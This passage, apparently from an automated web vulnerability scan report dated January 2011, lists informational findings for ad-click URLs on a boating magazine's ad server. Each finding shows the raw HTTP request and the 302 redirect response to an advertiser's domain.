  • http://oasc05139.247realmedia.com/RealMedia/ads/click_lx.ads/www.soundingsonline.com/index.php/L33/1972223152/x04/Dom_Ent/NovaScotia-Sound-TileAd/125x125_novascotia_0111.gif/726348573830302b4e47344144525279?x
The response contains the following link to another domain:
  • http://www.nsboats.com/

Request

GET /RealMedia/ads/click_lx.ads/www.soundingsonline.com/index.php/L33/1972223152/x04/Dom_Ent/NovaScotia-Sound-TileAd/125x125_novascotia_0111.gif/726348573830302b4e47344144525279?x HTTP/1.1
Host: oasc05139.247realmedia.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: NSC_d17efm_qppm_iuuq=ffffffff09499e3a45525d5f4f58455e445a4a423660; OAX=rcHW8003BLsABpSl;

Response

HTTP/1.1 302 Found
Date: Tue, 25 Jan 2011 15:47:44 GMT
Server: Apache/2.0.52 (Red Hat)
P3P: CP="NON NID PSAa PSDa OUR IND UNI COM NAV STA",policyref="/w3c/p3p.xml"
Location: http://www.nsboats.com/
Content-Length: 300
Keep-Alive: timeout=60
Connection: Keep-Alive
Content-Type: text/html; charset=iso-8859-1
Set-Cookie: NSC_d17efm_qppm_iuuq=ffffffff09419e3b45525d5f4f58455e445a4a423660;path=/

<!DOCTYPE HTML PUBLIC "-//IETF//DTD HTML 2.0//EN">
<html><head>
<title>302 Found</title>
</head><body>
<h1>Found</h1>
<p>The document has moved <a href="http://www.nsboats.com/">here</a>.</p>
<hr>
<ad
...[SNIP]...

20.325. http://oasc05139.247realmedia.com/RealMedia/ads/click_lx.ads/www.soundingsonline.com/index.php/L33/1988230146/Right/Dom_Ent/SeaTow-Sound-Rect-300x250/bfs_seatow_300x250.jpg/726348573830302b4e47344144525279

Summary

Severity:   Information
Confidence:   Certain
Host:   http://oasc05139.247realmedia.com
Path:   /RealMedia/ads/click_lx.ads/www.soundingsonline.com/index.php/L33/1988230146/Right/Dom_Ent/SeaTow-Sound-Rect-300x250/bfs_seatow_300x250.jpg/726348573830302b4e47344144525279

Issue detail

The page was loaded from a URL containing a query string:
  • http://oasc05139.247realmedia.com/RealMedia/ads/click_lx.ads/www.soundingsonline.com/index.php/L33/1988230146/Right/Dom_Ent/SeaTow-Sound-Rect-300x250/bfs_seatow_300x250.jpg/726348573830302b4e47344144525279?x
The response contains the following link to another domain:
  • https://www.soundingssellmyboat.com/webbase/en/std/jsp/WebBaseMain.do;jsessionid=C2A3BE71EE34C5087C97F3A067159F18

Request

GET /RealMedia/ads/click_lx.ads/www.soundingsonline.com/index.php/L33/1988230146/Right/Dom_Ent/SeaTow-Sound-Rect-300x250/bfs_seatow_300x250.jpg/726348573830302b4e47344144525279?x HTTP/1.1
Host: oasc05139.247realmedia.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: NSC_d17efm_qppm_iuuq=ffffffff09499e3a45525d5f4f58455e445a4a423660; OAX=rcHW8003BLsABpSl;

Response

HTTP/1.1 302 Found
Date: Tue, 25 Jan 2011 14:51:26 GMT
Server: Apache/2.2.3 (Red Hat)
P3P: CP="NON NID PSAa PSDa OUR IND UNI COM NAV STA",policyref="/w3c/p3p.xml"
Location: https://www.soundingssellmyboat.com/webbase/en/std/jsp/WebBaseMain.do;jsessionid=C2A3BE71EE34C5087C97F3A067159F18
Content-Length: 389
Keep-Alive: timeout=60
Connection: Keep-Alive
Content-Type: text/html; charset=iso-8859-1

<!DOCTYPE HTML PUBLIC "-//IETF//DTD HTML 2.0//EN">
<html><head>
<title>302 Found</title>
</head><body>
<h1>Found</h1>
<p>The document has moved <a href="https://www.soundingssellmyboat.com/webbase/en/std/jsp/WebBaseMain.do;jsessionid=C2A3BE71EE34C5087C97F3A067159F18">here</a>
...[SNIP]...

20.326. http://oasc05139.247realmedia.com/RealMedia/ads/click_lx.ads/www.soundingsonline.com/index.php/L33/1989764170/Right1/Dom_Ent/SeaTow-Sound-Btn-300x100/bfs_seatow_300x100_Jul70910.jpg/726348573830302b4e47344144525279

Summary

Severity:   Information
Confidence:   Certain
Host:   http://oasc05139.247realmedia.com
Path:   /RealMedia/ads/click_lx.ads/www.soundingsonline.com/index.php/L33/1989764170/Right1/Dom_Ent/SeaTow-Sound-Btn-300x100/bfs_seatow_300x100_Jul70910.jpg/726348573830302b4e47344144525279

Issue detail

The page was loaded from a URL containing a query string:
  • http://oasc05139.247realmedia.com/RealMedia/ads/click_lx.ads/www.soundingsonline.com/index.php/L33/1989764170/Right1/Dom_Ent/SeaTow-Sound-Btn-300x100/bfs_seatow_300x100_Jul70910.jpg/726348573830302b4e47344144525279?x
The response contains the following link to another domain:
  • https://www.soundingssellmyboat.com/webbase/en/std/jsp/WebBaseMain.do;jsessionid=C2A3BE71EE34C5087C97F3A067159F18

Request

GET /RealMedia/ads/click_lx.ads/www.soundingsonline.com/index.php/L33/1989764170/Right1/Dom_Ent/SeaTow-Sound-Btn-300x100/bfs_seatow_300x100_Jul70910.jpg/726348573830302b4e47344144525279?x HTTP/1.1
Host: oasc05139.247realmedia.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: NSC_d17efm_qppm_iuuq=ffffffff09499e3a45525d5f4f58455e445a4a423660; OAX=rcHW8003BLsABpSl;

Response

HTTP/1.1 302 Found
Date: Tue, 25 Jan 2011 15:05:48 GMT
Server: Apache/2.0.52 (Red Hat)
P3P: CP="NON NID PSAa PSDa OUR IND UNI COM NAV STA",policyref="/w3c/p3p.xml"
Location: https://www.soundingssellmyboat.com/webbase/en/std/jsp/WebBaseMain.do;jsessionid=C2A3BE71EE34C5087C97F3A067159F18
Content-Length: 390
Keep-Alive: timeout=60
Connection: Keep-Alive
Content-Type: text/html; charset=iso-8859-1
Set-Cookie: NSC_d17efm_qppm_iuuq=ffffffff09419e3845525d5f4f58455e445a4a423660;path=/

<!DOCTYPE HTML PUBLIC "-//IETF//DTD HTML 2.0//EN">
<html><head>
<title>302 Found</title>
</head><body>
<h1>Found</h1>
<p>The document has moved <a href="https://www.soundingssellmyboat.com/webbase/en/std/jsp/WebBaseMain.do;jsessionid=C2A3BE71EE34C5087C97F3A067159F18">here</a>
...[SNIP]...

20.327. http://oasc05139.247realmedia.com/RealMedia/ads/click_lx.ads/www.soundingsonline.com/index.php/L33/1990120906/Right1/Dom_Ent/SeaTow-Sound-Btn-300x100/bfs_seatow_300x100_Jul70910.jpg/726348573830302b4e47344144525279

Summary

Severity:   Information
Confidence:   Certain
Host:   http://oasc05139.247realmedia.com
Path:   /RealMedia/ads/click_lx.ads/www.soundingsonline.com/index.php/L33/1990120906/Right1/Dom_Ent/SeaTow-Sound-Btn-300x100/bfs_seatow_300x100_Jul70910.jpg/726348573830302b4e47344144525279

Issue detail

The page was loaded from a URL containing a query string:
  • http://oasc05139.247realmedia.com/RealMedia/ads/click_lx.ads/www.soundingsonline.com/index.php/L33/1990120906/Right1/Dom_Ent/SeaTow-Sound-Btn-300x100/bfs_seatow_300x100_Jul70910.jpg/726348573830302b4e47344144525279?x
The response contains the following link to another domain:
  • https://www.soundingssellmyboat.com/webbase/en/std/jsp/WebBaseMain.do;jsessionid=C2A3BE71EE34C5087C97F3A067159F18

Request

GET /RealMedia/ads/click_lx.ads/www.soundingsonline.com/index.php/L33/1990120906/Right1/Dom_Ent/SeaTow-Sound-Btn-300x100/bfs_seatow_300x100_Jul70910.jpg/726348573830302b4e47344144525279?x HTTP/1.1
Host: oasc05139.247realmedia.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: NSC_d17efm_qppm_iuuq=ffffffff09499e3a45525d5f4f58455e445a4a423660; OAX=rcHW8003BLsABpSl;

Response

HTTP/1.1 302 Found
Date: Tue, 25 Jan 2011 14:41:25 GMT
Server: Apache/2.0.52 (Red Hat)
P3P: CP="NON NID PSAa PSDa OUR IND UNI COM NAV STA",policyref="/w3c/p3p.xml"
Location: https://www.soundingssellmyboat.com/webbase/en/std/jsp/WebBaseMain.do;jsessionid=C2A3BE71EE34C5087C97F3A067159F18
Content-Length: 390
Keep-Alive: timeout=60
Connection: Keep-Alive
Content-Type: text/html; charset=iso-8859-1
Set-Cookie: NSC_d17efm_qppm_iuuq=ffffffff09419e3b45525d5f4f58455e445a4a423660;path=/

<!DOCTYPE HTML PUBLIC "-//IETF//DTD HTML 2.0//EN">
<html><head>
<title>302 Found</title>
</head><body>
<h1>Found</h1>
<p>The document has moved <a href="https://www.soundingssellmyboat.com/webbase/en/std/jsp/WebBaseMain.do;jsessionid=C2A3BE71EE34C5087C97F3A067159F18">here</a>
...[SNIP]...

20.328. http://oasc05139.247realmedia.com/RealMedia/ads/click_lx.ads/www.soundingsonline.com/index.php/L33/1992827791/Right/Dom_Ent/SeaTow-Sound-Rect-300x250/bfs_seatow_300x250.jpg/726348573830302b4e47344144525279

Summary

Severity:   Information
Confidence:   Certain
Host:   http://oasc05139.247realmedia.com
Path:   /RealMedia/ads/click_lx.ads/www.soundingsonline.com/index.php/L33/1992827791/Right/Dom_Ent/SeaTow-Sound-Rect-300x250/bfs_seatow_300x250.jpg/726348573830302b4e47344144525279

Issue detail

The page was loaded from a URL containing a query string:
  • http://oasc05139.247realmedia.com/RealMedia/ads/click_lx.ads/www.soundingsonline.com/index.php/L33/1992827791/Right/Dom_Ent/SeaTow-Sound-Rect-300x250/bfs_seatow_300x250.jpg/726348573830302b4e47344144525279?x
The response contains the following link to another domain:
  • https://www.soundingssellmyboat.com/webbase/en/std/jsp/WebBaseMain.do;jsessionid=C2A3BE71EE34C5087C97F3A067159F18

Request

GET /RealMedia/ads/click_lx.ads/www.soundingsonline.com/index.php/L33/1992827791/Right/Dom_Ent/SeaTow-Sound-Rect-300x250/bfs_seatow_300x250.jpg/726348573830302b4e47344144525279?x HTTP/1.1
Host: oasc05139.247realmedia.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: NSC_d17efm_qppm_iuuq=ffffffff09499e3a45525d5f4f58455e445a4a423660; OAX=rcHW8003BLsABpSl;

Response

HTTP/1.1 302 Found
Date: Tue, 25 Jan 2011 14:41:23 GMT
Server: Apache/2.0.52 (Red Hat)
P3P: CP="NON NID PSAa PSDa OUR IND UNI COM NAV STA",policyref="/w3c/p3p.xml"
Location: https://www.soundingssellmyboat.com/webbase/en/std/jsp/WebBaseMain.do;jsessionid=C2A3BE71EE34C5087C97F3A067159F18
Content-Length: 390
Keep-Alive: timeout=60
Connection: Keep-Alive
Content-Type: text/html; charset=iso-8859-1
Set-Cookie: NSC_d17efm_qppm_iuuq=ffffffff09419e3b45525d5f4f58455e445a4a423660;path=/

<!DOCTYPE HTML PUBLIC "-//IETF//DTD HTML 2.0//EN">
<html><head>
<title>302 Found</title>
</head><body>
<h1>Found</h1>
<p>The document has moved <a href="https://www.soundingssellmyboat.com/webbase/en/std/jsp/WebBaseMain.do;jsessionid=C2A3BE71EE34C5087C97F3A067159F18">here</a>
...[SNIP]...

20.329. http://oasc05139.247realmedia.com/RealMedia/ads/click_lx.ads/www.soundingsonline.com/index.php/L33/1993017733/Right1/Dom_Ent/SeaTow-Sound-Btn-300x100/bfs_seatow_300x100_Jul70910.jpg/726348573830302b4e47344144525279

Summary

Severity:   Information
Confidence:   Certain
Host:   http://oasc05139.247realmedia.com
Path:   /RealMedia/ads/click_lx.ads/www.soundingsonline.com/index.php/L33/1993017733/Right1/Dom_Ent/SeaTow-Sound-Btn-300x100/bfs_seatow_300x100_Jul70910.jpg/726348573830302b4e47344144525279

Issue detail

The page was loaded from a URL containing a query string:
  • http://oasc05139.247realmedia.com/RealMedia/ads/click_lx.ads/www.soundingsonline.com/index.php/L33/1993017733/Right1/Dom_Ent/SeaTow-Sound-Btn-300x100/bfs_seatow_300x100_Jul70910.jpg/726348573830302b4e47344144525279?x
The response contains the following link to another domain:
  • https://www.soundingssellmyboat.com/webbase/en/std/jsp/WebBaseMain.do;jsessionid=C2A3BE71EE34C5087C97F3A067159F18

Request

GET /RealMedia/ads/click_lx.ads/www.soundingsonline.com/index.php/L33/1993017733/Right1/Dom_Ent/SeaTow-Sound-Btn-300x100/bfs_seatow_300x100_Jul70910.jpg/726348573830302b4e47344144525279?x HTTP/1.1
Host: oasc05139.247realmedia.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: NSC_d17efm_qppm_iuuq=ffffffff09499e3a45525d5f4f58455e445a4a423660; OAX=rcHW8003BLsABpSl;

Response

HTTP/1.1 302 Found
Date: Tue, 25 Jan 2011 14:55:51 GMT
Server: Apache/2.2.3 (Red Hat)
P3P: CP="NON NID PSAa PSDa OUR IND UNI COM NAV STA",policyref="/w3c/p3p.xml"
Location: https://www.soundingssellmyboat.com/webbase/en/std/jsp/WebBaseMain.do;jsessionid=C2A3BE71EE34C5087C97F3A067159F18
Content-Length: 389
Keep-Alive: timeout=60
Connection: Keep-Alive
Content-Type: text/html; charset=iso-8859-1

<!DOCTYPE HTML PUBLIC "-//IETF//DTD HTML 2.0//EN">
<html><head>
<title>302 Found</title>
</head><body>
<h1>Found</h1>
<p>The document has moved <a href="https://www.soundingssellmyboat.com/webbase/en/std/jsp/WebBaseMain.do;jsessionid=C2A3BE71EE34C5087C97F3A067159F18">here</a>
...[SNIP]...

20.330. http://oasc05139.247realmedia.com/RealMedia/ads/click_lx.ads/www.soundingsonline.com/index.php/L33/2000460958/x01/Dom_Ent/NovaScotia-Sound-TileAd/125x125_novascotia_0111.gif/726348573830302b4e47344144525279

Summary

Severity:   Information
Confidence:   Certain
Host:   http://oasc05139.247realmedia.com
Path:   /RealMedia/ads/click_lx.ads/www.soundingsonline.com/index.php/L33/2000460958/x01/Dom_Ent/NovaScotia-Sound-TileAd/125x125_novascotia_0111.gif/726348573830302b4e47344144525279

Issue detail

The page was loaded from a URL containing a query string:
  • http://oasc05139.247realmedia.com/RealMedia/ads/click_lx.ads/www.soundingsonline.com/index.php/L33/2000460958/x01/Dom_Ent/NovaScotia-Sound-TileAd/125x125_novascotia_0111.gif/726348573830302b4e47344144525279?x
The response contains the following link to another domain:
  • http://www.nsboats.com/

Request

GET /RealMedia/ads/click_lx.ads/www.soundingsonline.com/index.php/L33/2000460958/x01/Dom_Ent/NovaScotia-Sound-TileAd/125x125_novascotia_0111.gif/726348573830302b4e47344144525279?x HTTP/1.1
Host: oasc05139.247realmedia.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: NSC_d17efm_qppm_iuuq=ffffffff09499e3a45525d5f4f58455e445a4a423660; OAX=rcHW8003BLsABpSl;

Response

HTTP/1.1 302 Found
Date: Tue, 25 Jan 2011 16:22:10 GMT
Server: Apache/2.0.52 (Red Hat)
P3P: CP="NON NID PSAa PSDa OUR IND UNI COM NAV STA",policyref="/w3c/p3p.xml"
Location: http://www.nsboats.com/
Content-Length: 300
Keep-Alive: timeout=60
Connection: Keep-Alive
Content-Type: text/html; charset=iso-8859-1
Set-Cookie: NSC_d17efm_qppm_iuuq=ffffffff09419e3845525d5f4f58455e445a4a423660;path=/

<!DOCTYPE HTML PUBLIC "-//IETF//DTD HTML 2.0//EN">
<html><head>
<title>302 Found</title>
</head><body>
<h1>Found</h1>
<p>The document has moved <a href="http://www.nsboats.com/">here</a>.</p>
<hr>
<ad
...[SNIP]...

20.331. http://oasc05139.247realmedia.com/RealMedia/ads/click_lx.ads/www.soundingsonline.com/index.php/L33/2003665576/x03/Dom_Ent/CMTA-Sound-TileAd/cmta_0111.gif/726348573830302b4e47344144525279

Summary

Severity:   Information
Confidence:   Certain
Host:   http://oasc05139.247realmedia.com
Path:   /RealMedia/ads/click_lx.ads/www.soundingsonline.com/index.php/L33/2003665576/x03/Dom_Ent/CMTA-Sound-TileAd/cmta_0111.gif/726348573830302b4e47344144525279

Issue detail

The page was loaded from a URL containing a query string:
  • http://oasc05139.247realmedia.com/RealMedia/ads/click_lx.ads/www.soundingsonline.com/index.php/L33/2003665576/x03/Dom_Ent/CMTA-Sound-TileAd/cmta_0111.gif/726348573830302b4e47344144525279?x
The response contains the following link to another domain:
  • http://www.gssdesign.com/cmta_landing11/

Request

GET /RealMedia/ads/click_lx.ads/www.soundingsonline.com/index.php/L33/2003665576/x03/Dom_Ent/CMTA-Sound-TileAd/cmta_0111.gif/726348573830302b4e47344144525279?x HTTP/1.1
Host: oasc05139.247realmedia.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: NSC_d17efm_qppm_iuuq=ffffffff09499e3a45525d5f4f58455e445a4a423660; OAX=rcHW8003BLsABpSl;

Response

HTTP/1.1 302 Found
Date: Tue, 25 Jan 2011 14:56:38 GMT
Server: Apache/2.2.3 (Red Hat)
P3P: CP="NON NID PSAa PSDa OUR IND UNI COM NAV STA",policyref="/w3c/p3p.xml"
Location: http://www.gssdesign.com/cmta_landing11/
Content-Length: 316
Keep-Alive: timeout=60
Connection: Keep-Alive
Content-Type: text/html; charset=iso-8859-1

<!DOCTYPE HTML PUBLIC "-//IETF//DTD HTML 2.0//EN">
<html><head>
<title>302 Found</title>
</head><body>
<h1>Found</h1>
<p>The document has moved <a href="http://www.gssdesign.com/cmta_landing11/">here</a>
...[SNIP]...

20.332. http://oasc05139.247realmedia.com/RealMedia/ads/click_lx.ads/www.soundingsonline.com/index.php/L33/2011877321/x01/Dom_Ent/Keenan-Sound-TileAd/125x125_keenan_0111_new.jpg/726348573830302b4e47344144525279

Summary

Severity:   Information
Confidence:   Certain
Host:   http://oasc05139.247realmedia.com
Path:   /RealMedia/ads/click_lx.ads/www.soundingsonline.com/index.php/L33/2011877321/x01/Dom_Ent/Keenan-Sound-TileAd/125x125_keenan_0111_new.jpg/726348573830302b4e47344144525279

Issue detail

The page was loaded from a URL containing a query string:
  • http://oasc05139.247realmedia.com/RealMedia/ads/click_lx.ads/www.soundingsonline.com/index.php/L33/2011877321/x01/Dom_Ent/Keenan-Sound-TileAd/125x125_keenan_0111_new.jpg/726348573830302b4e47344144525279?x
The response contains the following link to another domain:
  • http://www.keenanauction.com/auction.cgi?&i=2039

Request

GET /RealMedia/ads/click_lx.ads/www.soundingsonline.com/index.php/L33/2011877321/x01/Dom_Ent/Keenan-Sound-TileAd/125x125_keenan_0111_new.jpg/726348573830302b4e47344144525279?x HTTP/1.1
Host: oasc05139.247realmedia.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: NSC_d17efm_qppm_iuuq=ffffffff09499e3a45525d5f4f58455e445a4a423660; OAX=rcHW8003BLsABpSl;

Response

HTTP/1.1 302 Found
Date: Tue, 25 Jan 2011 15:00:02 GMT
Server: Apache/2.2.3 (Red Hat)
P3P: CP="NON NID PSAa PSDa OUR IND UNI COM NAV STA",policyref="/w3c/p3p.xml"
Location: http://www.keenanauction.com/auction.cgi?&i=2039
Content-Length: 328
Keep-Alive: timeout=60
Connection: Keep-Alive
Content-Type: text/html; charset=iso-8859-1

<!DOCTYPE HTML PUBLIC "-//IETF//DTD HTML 2.0//EN">
<html><head>
<title>302 Found</title>
</head><body>
<h1>Found</h1>
<p>The document has moved <a href="http://www.keenanauction.com/auction.cgi?&amp;i=2039">here</a>
...[SNIP]...

20.333. http://oasc05139.247realmedia.com/RealMedia/ads/click_lx.ads/www.soundingsonline.com/index.php/L33/2018916786/x01/Dom_Ent/NovaScotia-Sound-TileAd/125x125_novascotia_0111.gif/726348573830302b4e47344144525279

Summary

Severity:   Information
Confidence:   Certain
Host:   http://oasc05139.247realmedia.com
Path:   /RealMedia/ads/click_lx.ads/www.soundingsonline.com/index.php/L33/2018916786/x01/Dom_Ent/NovaScotia-Sound-TileAd/125x125_novascotia_0111.gif/726348573830302b4e47344144525279

Issue detail

The page was loaded from a URL containing a query string:
  • http://oasc05139.247realmedia.com/RealMedia/ads/click_lx.ads/www.soundingsonline.com/index.php/L33/2018916786/x01/Dom_Ent/NovaScotia-Sound-TileAd/125x125_novascotia_0111.gif/726348573830302b4e47344144525279?x
The response contains the following link to another domain:
  • http://www.nsboats.com/

Request

GET /RealMedia/ads/click_lx.ads/www.soundingsonline.com/index.php/L33/2018916786/x01/Dom_Ent/NovaScotia-Sound-TileAd/125x125_novascotia_0111.gif/726348573830302b4e47344144525279?x HTTP/1.1
Host: oasc05139.247realmedia.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: NSC_d17efm_qppm_iuuq=ffffffff09499e3a45525d5f4f58455e445a4a423660; OAX=rcHW8003BLsABpSl;

Response

HTTP/1.1 302 Found
Date: Tue, 25 Jan 2011 14:57:41 GMT
Server: Apache/2.2.3 (Red Hat)
P3P: CP="NON NID PSAa PSDa OUR IND UNI COM NAV STA",policyref="/w3c/p3p.xml"
Location: http://www.nsboats.com/
Content-Length: 299
Keep-Alive: timeout=60
Connection: Keep-Alive
Content-Type: text/html; charset=iso-8859-1

<!DOCTYPE HTML PUBLIC "-//IETF//DTD HTML 2.0//EN">
<html><head>
<title>302 Found</title>
</head><body>
<h1>Found</h1>
<p>The document has moved <a href="http://www.nsboats.com/">here</a>.</p>
<hr>
<ad
...[SNIP]...

20.334. http://oasc05139.247realmedia.com/RealMedia/ads/click_lx.ads/www.soundingsonline.com/index.php/L33/2027917108/x02/Dom_Ent/Keenan-Sound-TileAd/125x125_keenan_0111_new.jpg/726348573830302b4e47344144525279

Summary

Severity:   Information
Confidence:   Certain
Host:   http://oasc05139.247realmedia.com
Path:   /RealMedia/ads/click_lx.ads/www.soundingsonline.com/index.php/L33/2027917108/x02/Dom_Ent/Keenan-Sound-TileAd/125x125_keenan_0111_new.jpg/726348573830302b4e47344144525279

Issue detail

The page was loaded from a URL containing a query string:
  • http://oasc05139.247realmedia.com/RealMedia/ads/click_lx.ads/www.soundingsonline.com/index.php/L33/2027917108/x02/Dom_Ent/Keenan-Sound-TileAd/125x125_keenan_0111_new.jpg/726348573830302b4e47344144525279?x
The response contains the following link to another domain:
  • http://www.keenanauction.com/auction.cgi?&i=2039

Request

GET /RealMedia/ads/click_lx.ads/www.soundingsonline.com/index.php/L33/2027917108/x02/Dom_Ent/Keenan-Sound-TileAd/125x125_keenan_0111_new.jpg/726348573830302b4e47344144525279?x HTTP/1.1
Host: oasc05139.247realmedia.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: NSC_d17efm_qppm_iuuq=ffffffff09499e3a45525d5f4f58455e445a4a423660; OAX=rcHW8003BLsABpSl;

Response

HTTP/1.1 302 Found
Date: Tue, 25 Jan 2011 14:53:07 GMT
Server: Apache/2.2.3 (Red Hat)
P3P: CP="NON NID PSAa PSDa OUR IND UNI COM NAV STA",policyref="/w3c/p3p.xml"
Location: http://www.keenanauction.com/auction.cgi?&i=2039
Content-Length: 328
Keep-Alive: timeout=60
Connection: Keep-Alive
Content-Type: text/html; charset=iso-8859-1

<!DOCTYPE HTML PUBLIC "-//IETF//DTD HTML 2.0//EN">
<html><head>
<title>302 Found</title>
</head><body>
<h1>Found</h1>
<p>The document has moved <a href="http://www.keenanauction.com/auction.cgi?&amp;i=2039">here</a>
...[SNIP]...

20.335. http://oasc05139.247realmedia.com/RealMedia/ads/click_lx.ads/www.soundingsonline.com/index.php/L33/2028781671/Right1/Dom_Ent/House-Sound-Btn/bs_de_ad_300x100.jpg/726348573830302b4e47344144525279

Summary

Severity:   Information
Confidence:   Certain
Host:   http://oasc05139.247realmedia.com
Path:   /RealMedia/ads/click_lx.ads/www.soundingsonline.com/index.php/L33/2028781671/Right1/Dom_Ent/House-Sound-Btn/bs_de_ad_300x100.jpg/726348573830302b4e47344144525279

Issue detail

The page was loaded from a URL containing a query string:
  • http://oasc05139.247realmedia.com/RealMedia/ads/click_lx.ads/www.soundingsonline.com/index.php/L33/2028781671/Right1/Dom_Ent/House-Sound-Btn/bs_de_ad_300x100.jpg/726348573830302b4e47344144525279?x
The response contains the following link to another domain:
  • http://www.myonlinepubs.com/publication?i=59161

Request

GET /RealMedia/ads/click_lx.ads/www.soundingsonline.com/index.php/L33/2028781671/Right1/Dom_Ent/House-Sound-Btn/bs_de_ad_300x100.jpg/726348573830302b4e47344144525279?x HTTP/1.1
Host: oasc05139.247realmedia.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: NSC_d17efm_qppm_iuuq=ffffffff09499e3a45525d5f4f58455e445a4a423660; OAX=rcHW8003BLsABpSl;

Response

HTTP/1.1 302 Found
Date: Tue, 25 Jan 2011 14:50:18 GMT
Server: Apache/2.2.3 (Red Hat)
P3P: CP="NON NID PSAa PSDa OUR IND UNI COM NAV STA",policyref="/w3c/p3p.xml"
Location: http://www.myonlinepubs.com/publication?i=59161
Content-Length: 323
Keep-Alive: timeout=60
Connection: Keep-Alive
Content-Type: text/html; charset=iso-8859-1

<!DOCTYPE HTML PUBLIC "-//IETF//DTD HTML 2.0//EN">
<html><head>
<title>302 Found</title>
</head><body>
<h1>Found</h1>
<p>The document has moved <a href="http://www.myonlinepubs.com/publication?i=59161">here</a>
...[SNIP]...

20.336. http://oasc05139.247realmedia.com/RealMedia/ads/click_lx.ads/www.soundingsonline.com/index.php/L33/2033280661/Right1/Dom_Ent/SeaTow-Sound-Btn-300x100/bfs_seatow_300x100_Jul70910.jpg/726348573830302b4e47344144525279

Summary

Severity:   Information
Confidence:   Certain
Host:   http://oasc05139.247realmedia.com
Path:   /RealMedia/ads/click_lx.ads/www.soundingsonline.com/index.php/L33/2033280661/Right1/Dom_Ent/SeaTow-Sound-Btn-300x100/bfs_seatow_300x100_Jul70910.jpg/726348573830302b4e47344144525279

Issue detail

The page was loaded from a URL containing a query string:
  • http://oasc05139.247realmedia.com/RealMedia/ads/click_lx.ads/www.soundingsonline.com/index.php/L33/2033280661/Right1/Dom_Ent/SeaTow-Sound-Btn-300x100/bfs_seatow_300x100_Jul70910.jpg/726348573830302b4e47344144525279?x
The response contains the following link to another domain:
  • https://www.soundingssellmyboat.com/webbase/en/std/jsp/WebBaseMain.do;jsessionid=C2A3BE71EE34C5087C97F3A067159F18

Request

GET /RealMedia/ads/click_lx.ads/www.soundingsonline.com/index.php/L33/2033280661/Right1/Dom_Ent/SeaTow-Sound-Btn-300x100/bfs_seatow_300x100_Jul70910.jpg/726348573830302b4e47344144525279?x HTTP/1.1
Host: oasc05139.247realmedia.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: NSC_d17efm_qppm_iuuq=ffffffff09499e3a45525d5f4f58455e445a4a423660; OAX=rcHW8003BLsABpSl;

Response

HTTP/1.1 302 Found
Date: Tue, 25 Jan 2011 15:23:15 GMT
Server: Apache/2.2.3 (Red Hat)
P3P: CP="NON NID PSAa PSDa OUR IND UNI COM NAV STA",policyref="/w3c/p3p.xml"
Location: https://www.soundingssellmyboat.com/webbase/en/std/jsp/WebBaseMain.do;jsessionid=C2A3BE71EE34C5087C97F3A067159F18
Content-Length: 389
Keep-Alive: timeout=60
Connection: Keep-Alive
Content-Type: text/html; charset=iso-8859-1

<!DOCTYPE HTML PUBLIC "-//IETF//DTD HTML 2.0//EN">
<html><head>
<title>302 Found</title>
</head><body>
<h1>Found</h1>
<p>The document has moved <a href="https://www.soundingssellmyboat.com/webbase/en/std/jsp/WebBaseMain.do;jsessionid=C2A3BE71EE34C5087C97F3A067159F18">here</a>
...[SNIP]...

20.337. http://oasc05139.247realmedia.com/RealMedia/ads/click_lx.ads/www.soundingsonline.com/index.php/L33/2035051749/Right/Dom_Ent/SeaTow-Sound-Rect-300x250/bfs_seatow_300x250.jpg/726348573830302b4e47344144525279

Summary

Severity:   Information
Confidence:   Certain
Host:   http://oasc05139.247realmedia.com
Path:   /RealMedia/ads/click_lx.ads/www.soundingsonline.com/index.php/L33/2035051749/Right/Dom_Ent/SeaTow-Sound-Rect-300x250/bfs_seatow_300x250.jpg/726348573830302b4e47344144525279

Issue detail

The page was loaded from a URL containing a query string:
  • http://oasc05139.247realmedia.com/RealMedia/ads/click_lx.ads/www.soundingsonline.com/index.php/L33/2035051749/Right/Dom_Ent/SeaTow-Sound-Rect-300x250/bfs_seatow_300x250.jpg/726348573830302b4e47344144525279?x
The response contains the following link to another domain:
  • https://www.soundingssellmyboat.com/webbase/en/std/jsp/WebBaseMain.do;jsessionid=C2A3BE71EE34C5087C97F3A067159F18

Request

GET /RealMedia/ads/click_lx.ads/www.soundingsonline.com/index.php/L33/2035051749/Right/Dom_Ent/SeaTow-Sound-Rect-300x250/bfs_seatow_300x250.jpg/726348573830302b4e47344144525279?x HTTP/1.1
Host: oasc05139.247realmedia.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: NSC_d17efm_qppm_iuuq=ffffffff09499e3a45525d5f4f58455e445a4a423660; OAX=rcHW8003BLsABpSl;

Response

HTTP/1.1 302 Found
Date: Tue, 25 Jan 2011 14:45:38 GMT
Server: Apache/2.2.3 (Red Hat)
P3P: CP="NON NID PSAa PSDa OUR IND UNI COM NAV STA",policyref="/w3c/p3p.xml"
